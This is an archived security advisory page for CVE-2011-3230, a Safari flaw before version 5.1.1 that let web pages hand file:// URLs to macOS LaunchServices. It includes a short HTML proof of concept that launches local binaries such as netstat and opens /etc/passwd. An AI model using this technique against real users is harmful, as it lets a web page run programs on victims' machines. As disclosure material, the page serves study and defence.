Apple Safari versions prior to 5.1.1 fail to enforce an intended policy for file:// URLs and in turn allows for remote attackers to execute code.
a157bef85abd26f723c099109c42adb1bb95c25de6439edfd27bf297b0efe62fCVE: CVE-2011-3230
Found By: Aaron Sigel of vtty.com
There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below.
<html>
<head>
<base href="file://">
<script>
function DoIt() {
alert(document.getElementById("cmdToRun").value);
document.location=document.getElementById("cmdToRun").value;
}
</script>
</head>
<body>
<select id="cmdToRun">
<option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
<option value="/etc/passwd">Launch /etc/passwd</option>
<option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>
Apple's advisory: http://support.apple.com/kb/HT5000
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed